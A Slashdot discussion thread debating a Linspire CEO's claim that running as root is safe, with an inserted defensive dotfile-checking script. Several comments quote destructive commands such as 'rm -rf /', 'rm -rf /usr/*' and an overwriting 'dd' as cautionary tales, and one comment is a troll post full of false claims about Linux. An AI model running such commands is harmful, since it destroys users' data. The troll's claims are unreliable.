Michael Robertson Says Root is Safe
Kez writes "HEXUS.net caught up with Michael Robertson, CEO of Linspire, at the UK launch of Linspire 5. Their interview with Mr. Robertson covers everything from hardware support to software patents, but a comment from Mr. Robertson on using root is perhaps the most interesting: "I defy anybody to tell me why is it more secure to not run as root. Nobody really has a good answer. They say 'oh, yeah, it is!', but it really isn't." I would imagine a few Slashdotters would dispute that."
- Any exploitable program you run as another user will still need a local escalation exploit in order to do anything harmful. If you run something like Apache as root, any vulnerability in programs such as phpMyAdmin will make your whole server go poof.
- rm -Rf / as non-root will make you give a sigh of relief. As root it will be your nightmare.
- ActiveX and a lot of spyware is contained in Windows when running as non-administrator. It's running as admin (like most people do) that causes the majority of problems.
This kind of talk is pandering to the lowest common denominator of user. Honestly, I feel users SHOULD learn a little bit about privileges before being handed the machine, and clicking on that file attachment. I know Slashdot attempts to soundbite things just like any other modern news media, so I'll quote:
Here's why: What's the most important thing on your desktop? It's the data. If someone gets access to your libraries or whatever, who cares? Your data is the most precious thing on your computer. And whether you log in as root or log in as user, you have access to that data, technically anyone who's compromising your account has access to your data as well.
MySQL, for instance, runs as a separate user. If I so desired, I could limit the login / password for my MySQL account to only allow row INSERTs and SELECTs, but no DELETEs or DROPs. If someone were to break into my account, they could see my data, but at least they couldn't delete from the table. As root, they could stop and start the actual service, and wipe out the whole directory for that matter.
I generally see what he's saying about data being king. But if your data is that important, you'll have other safeguards for protecting it, typically via (dun dun dun), user management! For instance, keep your accounting files under a different user, home directory chmodded to 700. Stuff like that.
Then you could say "Well, it's not really about your data, it's that people could accidentally mess things up!". Well, you could accidentally drive into a wall as well, it doesn't mean we should make all cars drive at 10 miles an hour. So, I don't see the added benefit.
Cars happen to have seat belts. Roads also have speed limits, so this analogy is flawed.
The best way for Linux to break into the market isn't to emulate windows entirely. The best way is to take the best of what windows has to offer, and augment it with the best of what Linux has to offer. After all, look at Firefox. Firefox didn't choose to adopt ActiveX, or adopt Microsoft's proprietary style transitions, or render CSS in the same broken way, right? Neither should Linux, or in this case, Linspire.
/^[A-Z0-9._%+-]+@[A-Z0-9.-]+\.[A-Z]{2,4}$/i
Michael: I think, like everything, it's a question of balance. Ease of use, versus security. I defy anybody to tell me why is it more secure to not run as root. Nobody really has a good answer. They say "oh, yeah, it is!", but it really isn't. Here's why: What's the most important thing on your desktop? It's the data. If someone gets access to your libraries or whatever, who cares? Your data is the most precious thing on your computer. And whether you log in as root or log in as user, you have access to that data, technically anyone who's compromising your account has access to your data as well.
Technically it's gaining control over your system without you knowing it, and running exploitable programs as root makes that easier. If the hackers get access to your libraries, programs, etc, they can do far more damage to you by sniffing your data w/o your knowledge. Hackers aren't going to just steal your data and run. If they can gain easy access to the system they are going to modify it and snoop everything and keep getting what they came for.
Michael: Then you could say "Well, it's not really about your data, it's that people could accidentally mess things up!". Well, you could accidentally drive into a wall as well, it doesn't mean we should make all cars drive at 10 miles an hour. So, I don't see the added benefit. I DO see it's an added pain in the ass when grandma tries to change her wallpaper, and it tells her "you don't have root privileges". What are you talking about, man? I'm just trying to use my computer, or change the clock, or any one of a hundred other things. So, people always say "it's less secure", but I defy anyone to point out a single instance, and people all go "Well, I, erm, it's theoretical!". There's no one area I think you can point out - In this instance, a machine that's run with the root user could be compromised, in this instance one couldn't be compromised.
I am in no way a master of Linux/UNIX and I never claimed to be but even I know that if you are exploited while running something as root more damage can be done to a lot more services, files, etc, than if you were just running it as a user. It's not theoretical. It's fucking very real and it's idiots like this guy that make it easier and easier for more zombie boxes to get out there. Look at Windows... Yeah, no, we don't need Linux to end up like that too.
I want to know who the hell this guy is talking to who doesn't give him a valid argument. I have a feeling they are and he isn't listening.
Michael: I know the hardcore geeks feel differently, that's fine. When somebody installs Linspire, we say "do you want to set up users, yes or no", we give them the choice, right there when they start up for the first time. If they want to set up multiple users, they're welcome to do that, but we don't force them to. That's the difference we have.
It shouldn't even be a choice. Prompt for a password (like OS X) when something that needs root privileges runs. If it has succeeded with the Mac then it can with Linspire users too. If you are so concerned about making the users have a positive Linux experience, rewrite the dialog boxes when they ask for "root privileges" so that they are human readable. Don't just eliminate it and say that there's no valid reason not to. Taking the easy way out doesn't solve the problem.
Since when is Michael Robertson a trusted source? He's an asshole that's just into pushing the envelope and making waves (remember Lindows and MP3.com?) Right now he's doing exactly the same thing. "See, those Linux users are trying to make it hard for the layperson to use "their" OS and I'm trying to make it easy. Listen to me! I'm trustworthy!"
Not running as root works like this. Your data is no more inherently safe than it is when you /are/ running as root, but nobody ELSE'S data will fall prey to your screwup, nor will the central integrity of the system. (For granny, this means that grandson Billy can ssh in, recover this morning's backups from the write-once partition, and she can keep going, having lost minimal data.)
Running as root is like pointing a loaded gun at everyone just in case they're a criminal.
Not running as root is like fastening your seat belt. Sure, you're not intending to get in an accident...
Running as root is like driving down the highway with your hood open and your oil cap off.
Not running as root is like locking your door when you leave.
Running as root is like posting to slashdot without reading TFA. :)
This flies in the face of science.
Coming from the Windows side, I hear this warning constantly, but rarely hear about the practical fallout. OK, splain, Lucy.
Don't disappoint your bird dog. Go to the range.
So that IE users don't end up downloading + installing every ActiveX spyware app in existence and messing up the entire computer?
You've got to be kidding me. Is this just a big troll or is this guy actually that ignorant? Who the hell has he been talking to anyway? The reason for doing day-to-day things as a non-superuser is one of the most basic security concepts ever. Even my parents understand this. The reason you don't run everything as root is to avoid COMPROMISING THE ENTIRE MACHINE if some random application has a vulnerability. You don't want each and every little program you run to potentially allow someone to gain full access to everything on your computer. Not to mention protecting the computer from the application itself. I don't want some poorly written piece of software accidentally deleting important system files or some other user's data. And how about protecting the system from the user themselves? How many people here have accidentally rm'd a bunch of important system files (or all of / for that matter)? I know I have and I consider myself a very careful person when it comes to such things.
C'mon... How fucking retarded can you be?
He does _almost_ make a good argument for his case though...
Here's why: What's the most important thing on your desktop? It's the data. If someone gets access to your libraries or whatever, who cares? Your data is the most precious thing on your computer. And whether you log in as root or log in as user, you have access to that data, technically anyone who's compromising your account has access to your data as well.
That statement does have some merit but it definitely isn't always true and even then, I would much rather compromise only my data than have someone gain access to the entire system. If they only get my data, that's all they get. If they gain access to the entire system there is no limit to what they can do... What if they want to set up a very well hidden rootkit and snoop around on my box (watching traffic, capturing credit cards, etc. etc.) for as long as possible? Not to mention multi-user systems... A compromised superuser gives them full access to EVERYONE's stuff.
And of course, after he says something nearly sensible he goes on to completely shoot himself in the foot by making another completely ridiculous challenge...
So, people always say "it's less secure", but I defy anyone to point out a single instance, and people all go "Well, I, erm, it's theoretical!". There's no one area I think you can point out - In this instance, a machine that's run with the root user could be compromised, in this instance one couldn't be compromised.
What world does this guy live in? Is he completely surrounded by idiots? Remind me never to go anywhere near Linspire.
I work as a consultant for several Fortune 500 companies, and I think I can shed a little light on the climate of the open source community at the moment. I believe that part of the reason that open source based startups are failing left and right is not an issue of marketing as it's commonly believed but more of an issue of the underlying technology.

I know that that's a strong statement to make, but I have evidence to back it up! At one of the major corps (5000+ employees) that I consult for, we wanted to integrate the shareware version of Linux into our server pool. The allure of not having to pay any restrictive licensing fees was too great to ignore. I recommended the installation of several boxes running the new 2.4.9 kernel, and my hopes were high that it would perform up to snuff with the Windows 2k boxes which were (and still are!) doing an AMAZING job at their respective tasks of serving HTTP requests, DNS, and fileserving.

I consider myself to be very technically inclined having programmed in VB for the last 8 years doing kernel level programming. I don't believe in C programming because contrary to popular belief, VB can go just as low level as C and the newest VB compiler generates code that's every bit as fast. I took it upon myself to configure the system from scratch and even used an optimised version of gcc 3.1 to increase the execution speed of the binaries. I integrated the 3 machines I had configured into the server pool, and I'd have to say the results were less than impressive... We all know that Linux isn't even close to being ready for the desktop, but I had heard that it was supposed to perform decently as a "server" based operating system. The 3 machines all went into swap immediately, and it was obvious that they weren't going to be able to handle the load in this "enterprise" environment. After running for less than 24 hours, 2 of them had experienced kernel panics caused by Bind and Apache crashing! Granted, Apache is a volunteer based project written by weekend hackers in their spare time while Microsoft's IIS has an actual professional full fledged development team devoted to it. Not to mention the fact that the Linux kernel itself lacks any support for any type of journaled filesystem, memory protection, SMP support, etc, but I thought that since Linux is based on such "old" technology that it would run with some level of stability. After several days of this type of behaviour, we decided to reinstall Windows 2k on the boxes to make sure it wasn't a hardware problem that was causing things to go wrong. The machines instantly shaped up and were seamlessly reintegrated into the server pool with just one Win2K machine doing more work than all 3 of the Linux boxes.

Needless to say, I won't be recommending Linux/FSF to any more of my clients. I'm disappointed that they won't be able to leverage the free cost of Linux to their advantage, but in this case I suppose the old adage stands true that, "you get what you pay for." I would have also liked to have access to the source code of the applications that we're running on our mission critical systems; however, from the looks of it, the Microsoft "shared source" program seems to offer all of the same freedoms as the GPL.

As things stand now, I can understand using Linux in academia to compile simple "Hello World" style programs and learn C programming, but I'm afraid that for anything more than a hobby OS, Windows 98/NT/2K are your only choices.
Some users will type in anything you tell them.
Single page article.
I would agree. The OS is not the problem, it's the user. The same thing applies to Windows. Using Windows with the Administrator account is perfectly safe if you're not an idiot. I don't see why it's unsafe to do so on a *nix system.
But I want to know his IP address.
Let's do "rm -rf /" and compare the results.
"I disapprove of what you say, but I will defend to the death your right to say it." - Voltaire
While we all want to start lambasting him for his obvious lack of understanding of the obvious, I think it is actually endemic of the real problem.
People do not understand anything about computer security.
They do not understand how to limit exposure.
They do not understand the vectors of software virus infection.
They do not understand the true problems of viral infection (that is: they want to eliminate the side effects, but do not care about the primary problem).
Mocking people for being clueless does not actually make them smarter, nor does it impress them with your 31337 Haxor Skillz.
How does the Slashdot Effect happen given that no slashdotters ever RTFA?
It is about as secure as windows.
root is unsafe because it is very easy to shoot one's self in the foot when root. Consider the trivial example of typing rm *, or rm -rf * in the wrong dir.
Mirror here
"I'd rather be a lightning rod than a seismometer." -Ken Kesey
sure running as root is safe, what's your ip again?
not allowing the installation of software without root password? How about protecting certain mission-critical parts of the system? Might those be good reasons not to use root as a main account?
Running as root can lead to the immediate destruction of your filesystem and potentially hardware by a malicious program, while running as a restricted user can only get your documents deleted or your system ground to a halt. The people who code Linspire are either too lazy or incompetent to implement a Mac OS X-like security system, where the user inputs their password for operations that require root.
I'd like him to run on an account where he's not root, thanks.
I think this is possibly the dumbest thing I have seen. I always thought the implications were obvious.
Hmm... Root can write to ANY file? Open ANY Port?
Why even have security on a system? No one has ever given a good reason that it works.. I mean look at all the compromised systems out there. Security clearly doesn't work.
this should be good enough reason right here not to run as root.
./
/
/boot & /etc were the first things rm'ed
rm -rf
and btw, i didn't press the . hard enough cause i was typing really fast so it ended up looking like this:
rm -rf
oh and btw,
This reminds me of a shirt I once saw:
"Daddy, what does 'Formatting C:' mean?"
Yes that was in DOS, but you get the point.
Well, there's spam egg sausage and spam, that's not got much spam in it.
Well, doesn't his company sell support contracts to joe users? Keeping this in mind, wouldn't this qualify as taking care of job security?
No, wouldn't want to be the tech support person either.
In the article, Michael defines security as the (in)ability to access personal data. In that respect, he's probably right. But I think he oversimplifies the real question of allowing the users to run under the one account that could really screw up their machine.
He argues that just because we could possibly drive our cars into brick walls doesn't mean we should all be limited to driving at 10 mph. I don't believe the likelihood of even the least skilled driver actually ramming into a brick wall is quite as much as my grandma's likelihood of completely screwing up her computer were she granted root access. I've seen her mess up her Windows machine pretty nicely.
http://nerdfortress.com/
Oh no! Not /boot and /etc! How will I ever replace those?!
Thinking of modding me down? You need to RTFA too.
-- 'The' Lord and Master Bitman On High, Master Of All
chmod 777 -R
amongst a high seas of other things that make running as root insane on the "woops scale"
as to being in danger from a remote source, well if you make a connection, an open connection, to someone you don't know when you're root then
The only things certain in war are Propaganda and Death. You can never be sure which is which though
Who didn't see this coming?
What, so the name "Lindows" didn't clue you in from the start?
Random anti-Linux gibberish; nothing to do with this (or any, really) topic.
But then again, unlike everyone else, I'm not an idiot!!!!!!1
/usr/ instead of /usr/samba/ (mind fart), or accidentally hitting enter before you can complete "kill 14914", and ending up with "kill 1"... nasty results, stupidly unnecessary.
On a serious note, he really shouldn't have said that. I know he's just defending a practice that's encouraged natively by his product, but saying something like that kills a lot of credibility instantly.
Running as root is bad because it unnecessarily allows room for user (or program) error which can often have devastating results.
It also allows normal security glitches in programs the same access to cause such undesirable effects. The stupid buffer overflow in Mozilla just went from erasing your home directory (full of scanned comic books and editor preferences) to erasing 5 years of corporate data. Woops!
Not to mention that at one point or another, everyone screws up a command. Be it typing rm -Rf
These things can't be prevented entirely, but running as a non-privileged user goes a long way, not to mention it helps encourage proper access and operational policies in the system.
This is exactly the kind of attitude that I'd expect from someone that learned everything they know about computers from working with MS-DOS... he can't seem to conceive of the notion that there might be more than one person's data on a single machine!
"Freedom means freedom for everybody" -- Dick Cheney
Let's just wait until he has 100 million customers (98% of which will be totally clueless if the Windows user base is any indication) and we'll see if it's such a good idea.
Why is it more secure not to run as root?
500,000 Windows zombies should be the only answer you need.
include $sig;
1;
Really someone ought to put him in a room with Theo to see if they cancel eachother out.
So every user on a system usually can make files in /tmp. Let's say that a malicious user of the system goes into /tmp and makes an executable file named ls. That executable file contains the code which opens up a backdoor onto the system via netcat. If you were running as a normal user and ran ls in /tmp then you would not open up any backdoor. In fact, you might realize what's going on and be able to fix it. If you were root however, the backdoor would open wide and let the whole world have a root shell on your machine. This particular problem can be averted by removing . from $PATH of all users including root. But does Linspire do this? I don't know for sure, but I doubt it.
Linspire, Linux dumbed down for dummies by dummies.
The GeekNights podcast is going strong. Listen!
... however, your comment about Firefox not adopting ActiveX, I would put to you, is actually not a good thing. Many, many Microsoft software developers are exploiting this, and without ActiveX compatibility they aren't going to migrate to Firefox very quickly (if at all).
On a side note: this is sort of like Word and Excel macros and OpenOffice.org. Without them, Oo.org is missing quite a few companies.
XML is like violence. If it doesn't solve the problem, use more.
Default DCC save directory is ~. Many users of IRC are accustomed to permitting auto-accept of files. Someone sends you a .profile or .bashrc. .profile is sourced on every login. Hmm, I wonder what happened to all my filesystems.
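One way to notice a dropped `.profile` or `.bashrc` before the next login sources it: keep a checksum baseline of the login files and compare on demand. This is an added example, not from the thread or any IRC client; it uses only POSIX `cksum` and `awk`, and `DOTFILES`, `dotfile_sum`, `baseline_dotfiles` and `check_dotfiles` are names chosen here.

```shell
#!/bin/sh
# Added example (not from the thread): a small integrity baseline for the
# files a login shell sources, so a .profile or .bashrc that arrived through
# an auto-accepted file transfer shows up as "new" or "changed" before the
# next login runs it.

# Login files worth watching; extend to taste.
DOTFILES=".profile .bash_profile .bashrc .bash_login .login .cshrc .zshrc .zprofile"

# Checksum of one file as "crc size" (cksum on stdin prints no filename).
dotfile_sum() {
    cksum < "$1" | awk '{print $1, $2}'
}

# Record "name crc size" for every dotfile present under home dir $1 into $2.
baseline_dotfiles() {
    bl_home=$1
    bl_out=$2
    : > "$bl_out"
    for f in $DOTFILES; do
        [ -f "$bl_home/$f" ] || continue
        printf '%s %s\n' "$f" "$(dotfile_sum "$bl_home/$f")" >> "$bl_out"
    done
}

# Compare home dir $1 against baseline file $2; print one line per difference.
# Returns 0 when everything matches the baseline, 1 otherwise.
check_dotfiles() {
    ck_home=$1
    ck_base=$2
    ck_bad=0
    for f in $DOTFILES; do
        recorded=$(awk -v n="$f" '$1 == n {print $2, $3}' "$ck_base")
        if [ -f "$ck_home/$f" ]; then
            current=$(dotfile_sum "$ck_home/$f")
        else
            current=""
        fi
        [ "$recorded" = "$current" ] && continue
        if [ -z "$recorded" ]; then
            echo "new: $f"
        elif [ -z "$current" ]; then
            echo "removed: $f"
        else
            echo "changed: $f"
        fi
        ck_bad=1
    done
    return $ck_bad
}

# Usage: baseline_dotfiles "$HOME" ~/.dotfiles.baseline   (once, on a known-good system)
#        check_dotfiles "$HOME" ~/.dotfiles.baseline      (before logging in again)
```

Store the baseline somewhere the login shell cannot silently overwrite, such as a file owned by another account or read from removable media; a baseline that lives next to the dotfiles is only as trustworthy as they are.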
...lots of people have a blank password. I've seen it countless times in a windows environment.
Let's say user A has a blank password, and runs as root. Said user also turns on SSH. Say hello to remote access for anyone who knows your IP, and goodbye to your computer (unless he simply installs a trojan as root... what fun!).
Interestingly, OS X allows you to enable and disable the ability to login as root as needed. Logging in as root by default is disabled (though commands can obviously be run as root with su).
I wish I were old enough to put "Computer" on my resume.
1) It protects you from yourself. Nobody's perfect all the time.
2) It limits damage from exploits. Go ahead and be root if you aren't networked and never insert media, or are running a perfectly-secure OS.
3) it protects you from another user's malice. N/A for single-user machines.
Examples of when it is OK to run as root:
1) many non-networked embedded systems, e.g. your microwave oven
2) the DOS box in the corner your kids play DOOM I on.
3) Demo machines at trade shows, but only if they are not networked and have no removable media.
Other examples where running as root isn't advisable but the damage is greatly mitigated include read-only systems like Knoppix.
Knowledge is how to play a game, intelligence is how to win, wisdom is knowing what game to play.
Linux's (well, Unix's) strength is the ability to do everything. That's why you need to be a user who isn't allowed to do some stuff :)
This would be worse than running Windows as an admin, because in Windows they have made stuff impossible to stop it being done for the wrong reasons, rather than putting a password on it. Maybe MS was right... No wait I meant Linspire is wrong.
# cat
Damn, my RAM is full of llamas.
Sure, you might have enough confidence in your setup to operate under root, but why would you intentionally do it when you could run things with fewer permissions? This is like saying "hey my router is l33t so i'm just gonna keep the DMZ on 24/7".
Never remove support beams from the building if you don't have to, eh?
All your base are belong to Google.
You suck. You've got nothing better to do than copy and paste stupid trolls to slashdot? This suggests one of two possibilities:
Before you counter with some sort of "well what about you, writing this stupid reply" type argument I should point out that I am only wasting my amazing intellect on a fuckhat like yourself because I'm currently waiting for several servers to come back up. It's either this or head off to the bathroom with my powerbook to masturbate to internet porn.
I have to say I love the OSX solution. For those of you that aren't familiar:
The method:
By default you don't use root (although it does exist)
By default a user may or may not be an "admin" user. An admin user may perform root-like operations by authenticating again, but they give their own same password to the OS to do things.
It still knows you're you, you're just super-you. So default files are created with you as owner, for instance. This is safer because it reduces slightly the number of escalations necessary.
The effects:
The actual user password being compromised is not the reason you need a separate root account, so they removed your need for two passwords.
Bad apps still need separate priv escalation to do any harm, even if you're running as admin.
BUT you don't have to log out of your GUI session to have one app - or even ONE PART of one app - run with escalated privileges, if you authorize it to.
This means you have NO REASON to ever run unnecessary apps as an admin. No downloading just that one file as root because you're in the middle of doing a rooty thing and forgot one.
The similar linux hack:
I know you can setup similar things with sudo and a little tweaking. But this is how every OSX box ships, and it ought to be how every GUI consumer linux box ships too.
Looking for freelance Actionscript (Flash/Flex) or ColdFusion work and/or freelance developers. Email me, put Slashdot
And how often have you actually done that by accident?
We all know the reasons not to run anything as root unnecessarily are many, but you have to think from his perspective as well. He's picturing clueless Linux desktop users, using a shrinkwrapped distro at home for personal use. If they were to only log in as a user rather than root, what does it buy them? Whoever gets them to run malicious code by exploiting them or their software will still get access to all of their data, since it was all stored as that user. And they still get access to backdoor all of the software they use, since they can screw the user's environment (PATH, LD_LIBRARY_PATH, etc).
About the only thing not running as root saves the poor nontechnical home end-user from is wiping out their hard drive, but all the data that's important to them contained therein is still destructable.
His point is in fact arguable - why bother?
11*43+456^2
Consider this:
a) an awful lot of home machines are either single user, or effectively single user (where everyone shares a single account)
b) all the system files are backed up on the nice, shiny install media
c) none of the user files are backed up
If you're not talking about a server or other shared/critical environment, then the only things of any real value on the machine are the user's own files. Root or not, they can toast them. Lindows, in case you hadn't noticed, is *not* aimed at servers...
It's official. Most of you are morons.
means that you don't have any standard user on the machine where you just have to guess the password. On the other hand, sharing the same password for sudo and the normal user, like OS X and Ubuntu do it, is as much of a security risk as having a dedicated root, because all you have to find out is how to get into the machine as a normal sudo user.
I knew Michael Robertson in college and he was a technological lamer and pretty much an A-hole. And he doesn't appear to have changed much. He's cobbling together whatever technologies he can get his hands on and then shamelessly pimping^H^H^H^H^H^H^H self promoting whatever his latest project is regardless of merit.
He unfortunately seems to have learned that there is little fact checking in the business press - especially where technology is concerned - and that if he can create a stir he can probably create profit.
It was several years before I realized that it was the same Michael but I visited the website and found his picture there - in multiple super high resolutions - seriously why would I want a 1435x1980 pixel image of him?
Does he think he's desktop material? There's even information for booking him for speaking engagements... but it's not about ego. *SIGH*
Look for the stock pump and dump scheme followed by an SEC investigation in 5 - 10 years...
=tkk
Bill Gates - Creationist?!?
I challenge a non-root user to screw up a system as bad as this.
dd if=bootimage.bin of=/dev/hda
"Weird," I thought. "Why did it come back so fast? Usually floppy writes take a whole lot longer?"
I had been doing
dd if=bootimage.bin of=/dev/fd0
and brainlocked.
Just read his responses.... [a few of my replies]
Running as root is dangerous, but is it more dangerous than the average home user is used to? Probably not. The average user probably runs Windows from a single user account with admin rights. For most people, the recycle bin is the only protection from stupid mistakes.
Malicious software can always trick the user into giving it administrator access. But if you always log in as root, one bad mouse gesture in the file explorer can make your system unusable. Just yesterday I saw someone with a master's degree trying to store MP3 files in /Library on Mac OS X.
Besides, if you have a family PC why would you want everyone messing up each other's files if they can have nice separate home directories?
Just how often is there more than one person's data on a machine? At home my computer is mine; at work everyone has their own machine. Well, my coworker checks my email while I'm away from the office for a few days to make sure no disasters are missed and I do the same for him, but that doesn't count. It's not 1980 anymore - most computers are single user machines.
... him having a chat with Theo de Raadt about this...
Aside from blaring user error (i.e. any command using -R) it is my opinion that the computer is already compromised if you have the system console. Gaining root or hardware access is fairly simple and things such as encrypted filesystems are obviously out of Linspire's scope. While I believe it would have been "better" had they used a sudo-like implementation (e.g. ksudo / Mac OS X) I can understand why a business would take the root approach.
I thought I'd pick on myself before somebody else did.
I know in linux you can, for instance, open a terminal, su, and execute a GUI app as root while in an X session not as root. However, there's no general linux way for doing this for a nonCLI user.
I also know that in Windows you can "run as" by providing that alternate password, and you could set your Administrator and user passwords the same. But you get all sorts of problems doing this - for instance with an app that needs admin privs to install but not to run.
Finally, I certainly know that not every single security thing Apple has done has been right. This thread is particularly about their admin-user design, which I think is an ideal DESIGN. If they left open a hole somewhere, they should fix it. But the design is brilliant.
Looking for freelance Actionscript (Flash/Flex) or ColdFusion work and/or freelance developers. Email me, put Slashdot
"we wanted to integrate the shareware version of Linux" Are you for real? Seriously? You're a consultant? You're being overpaid, or you're just blagging it.
'For we walk by faith, not by sight.' II Corinthians 5:7
Changing the wallpaper or the time? I don't believe you need root access for either. Even if you did, how difficult is it to change that? The car analogy is pretty weak. Does the average computer user - and the extensive computer user - take 10+ hours of computer-teaching lessons along with theory studies and months of needing your dad to sit by you as you type? Getting a driver's license requires you to know your car, more or less inside out. If every computer user would do that, MAYBE it'll be a valid analogy. Even so, not being root still saves you. People still drive into brick walls; Accidents still happen. And, using Robertson's analogy, people still type rm -rf / instead of whatever. You might say that all that is needed is a couple hours' work to reinstall everything, but isn't that the purpose of Linspire? To save time, for those to which that time is worth a lot of money?
Find free books.
With poorly designed hardware, it is possible to wear out the hardware. Cheap printers and disk drives are relatively easy to wear out in a worst-case scenario. Certain types of flash memory can be destroyed by flashing it a few thousand times. While your operating system may not require you to be root to overuse these components, in principle it COULD force you to be root to do this.
If you can write to BIOS or other boot-control data, you can potentially leave the hardware unbootable. Technically it's not hurting the hardware but you've still got a boat-anchor until it gets serviced.
Older monitors could be fried if set to a "bad state" and left there too long. Ironically, in X-Windows, you don't have to be root to change the video settings to such a "bad state."
Knowledge is how to play a game, intelligence is how to win, wisdom is knowing what game to play.
Uh well, I think he is actually that ignorant (or lost is more like it). This is the guy who started mp3.com and thought that the music industry was going to give him a big pat on the back for it and let them into their billionaires club. Even worse is how he down-talks illegal copying like it's a back-alley dirty activity, when in truth nobody is doing any worse than he has been, is, and will likely continue to do for the rest of his life. IMHO, he is the epitome of blind love for evil systems. No matter how poor it is, evil it is, he throws himself at it with pure optimism and glossy eyes.
Then you could say "Well, it's not really about your data, it's that people could accidentally mess things up!". Well, you could accidentally drive into a wall as well, it doesn't mean we should make all cars drive at 10 miles an hour. So, I don't see the added benefit.
The analogy is more than flawed. Adding a regulator to keep cars below 10 MPH would limit the utility of a car. What he's arguing for is more like replicating the controls and placing them at various points around the car. Sure, you can argue that's not inherently dangerous, but one does not have to think too hard to see scenarios where it could increase the odds of bad outcomes.
Michael "Root" Robertson is appointed to the Department of Homeland Security's Privacy Board.
This is exactly what I am talking about. For a desktop system, a single-user environment, USER ACCOUNTS ARE STUPID.
Not the dummy accounts with no access which various services run as (eg: mysql only has access to its DBs and nothing else), those are important.
But the USER of the computer. In an environment where he/she is the only user (true in 99.999% of cases- wastefulness debates being an unrelated issue), there is no reason at all to not run as root. For exactly the reasons mentioned in the article: Nobody gives a flying crap about anything they don't have write access to.
Why?
Because the things they don't already have write access to, they did not write. If they did not write them, they were written by someone else, and can be EASILY REPLACED. This is debian based. Something fucked up? Oh nos! apt-get install and happy new year.
We are not talking about a vast multi-user network on a secure system. We are talking about a desktop. A single person who wants to read e-mail. When shit happens, it can do just as much damage with a user account as it can without one.
"But... Hardware!"
If your hardware can be broken by saying not-nice things to it, that is a bug in the hardware. That is not something to be corrected by disallowing things from talking wrong. Why in the almighty fuck would you put up with hardware which dies if it is sent the "die now" command? This isn't the CIA, here.
magical metaphor land:
A man is known to kill people whenever someone says "hello!" instead of "knickerbockey boingydoo". Do you: lock him away and stare at him through a tiny hole forever, or: tell everyone in the universe that greetings will now be handled by a password-locked greeting machine whereby pushing the big green button will always produce the greeting "knickerbockeyboingydoo!" and attempting to give a greeting all by yourself will result in an error.
back to reality:
I don't use root because I prefer to see the word "shruggar" everywhere.
-- 'The' Lord and Master Bitman On High, Master Of All
RUN!
This guy is absolutely clueless about the basic security principles and even makes a fool of himself in public by showing how much wiser he is than the generations of researchers and engineers which established them :(
I would expect a Linux company CEO to know better than this or at least have a few smarter engineers to hit him with a cluestick when necessary.
Even Microsoft learned that running as root is wrong and causes tons of problems. Now a Linux distributor comes preaching the opposite? Unbelievable ...
If I have root access, I can change the data and you wouldn't even know that it had been changed unless you compared it with a known good backup.
Root puts EVERYTHING at risk.
Also, his car analogy is flawed because people DO accidentally drive into walls and trees and other cars. And many times, people DIE from that.
But we accept the risk because of the massive benefits of being that mobile.
What are the benefits of running as root instead of a regular account? I run Ubuntu and I never have a problem with my regular user account.
I was running as root setting up our debian server at work to do some level 1 raid magic. I was real close to finished after working on it the better part of a day or two ... after jumping around editing this file, doing that, mirroring a partition of a hard drive, I wanted to undo something a copy I made by nuking a directory ...instead I typed something dumb like:
rm -rf /usr/*
after hitting enter and realizing how dumb I really could be, I truly understood why you shouldn't be running around as Mr. Root.
Though I needed root privs to edit some of the conf files and what not, you realize that sometimes running as root is like having sex without a condom.
If you want to have kids, don't use a condom.
All of the rest of the times, though ... it's a real good idea, because the rhythm method just doesn't hack it ...
... he should rename his Linspire to something like Lindows.
Don't fight for your country, if your country does not fight for you.
rm -rf ~
Hey look, the system is screwed up the exact same amount, as far as absolutely anyone at all cares.
-- 'The' Lord and Master Bitman On High, Master Of All
OK, I'll bite.
Keeping in mind Linspire is totally Desktop-centric, I can see why they might have a radically different view on the permissions system from most existing Linux users.
I've already read lots of lengthy posts trashing this contrarian point of view. And they have a lot of good points, as yours does, but ultimately this reads like a single-user vs. multi-user culture clash.
The fact is that on any operating system when you have a single, important user who runs malicious code, it doesn't matter much whether they're root or not, unless the machine has a security model more fine-grained and well-integrated than anything currently in wide use.
If that user can access their own files, then their own files can be destroyed. If that user can access the internet, then the compromise can also send their files over it. Or it can simply make them a spam bot. Or a relay. If that user has an address book, then its contents can be targets for viral propagation. And so on, and so forth.
Frankly, to do most things attackers want to do, "root" is unnecessary. Nothing within the unix "user management" repertoire really lets you deal effectively with this problem, and what few solutions you do have are, let's be honest, ugly, cumbersome, evil hacks.
What stops all this? A real, heretofore unknown high-level security model, that actually says "The email program can access stored email data, preferences, and can talk to the network on this port, to these hosts" and "the word processor cannot talk IRC" and so forth. This requires a rich resource model, rethinking data storage metaphors, the whole nine yards. Unix does not have this. Windows hosts only have it in the crudest and most limited form with "personal firewalls" that to some extent at least police the network activities of applications.
So for all the Unix folks, of course, this disdain for the security model is heresy, but for the desktop world (and really, servers benefit greatly from a fresh perspective as well), it's not such a bad point. Unix lacks a security model rich enough to be truly useful to everyday users, and by extension, companies like Linspire that cater to them.
Tired of Political Trolls? Opt Out!
For a single user system, there's no good reason not to run as root. I regularly log in as root on all the systems I own.
Michael Robertson has such a long history of controversy for the sake of controversy that anything from this guy whatsoever goes like this: |
A bigger deal is Apple withdrawing setuid/gid in one of their OS "updates." Ouch.
http://tinyurl.com/4ny52
Linspire during installs now strongly encourages you to set up a root and user account.
So he's just posturing, but back in the day you had to assume anyone who got on your system could get root if they wanted it.
He's right that your data is very important, more important than the OS files..
We allowed one of our partners to log on to our system to do some setup/testing as 'toor' with a different password but with root privileges. Oh yeah, like the unimaginable, he did a 'rm -rf *' on the wrong window with / as current dir. At least he can't log on to our production server to do the same thing.
All I have to say is that running a Gentoo install while completely drunk is extremely entertaining, even if extremely hazardous for your health.
Drunken root is not like being a drunken master of kung fu.
it only takes one time ... and yes, I've actually done something close enough to that to realize that one time is enough.
He's dead right, Linux users running everything as root is the only strategy that would offer any safety for Microsoft.
"The question of whether machines can think is no more interesting than [] whether submarines can swim" - Dijkstra
I never liked Linspire, but this statement has just become my #1 reason to recommend users against ever trying it.
There are lots of fine Linux distributions around that care about security, so why choose one that doesn't care?
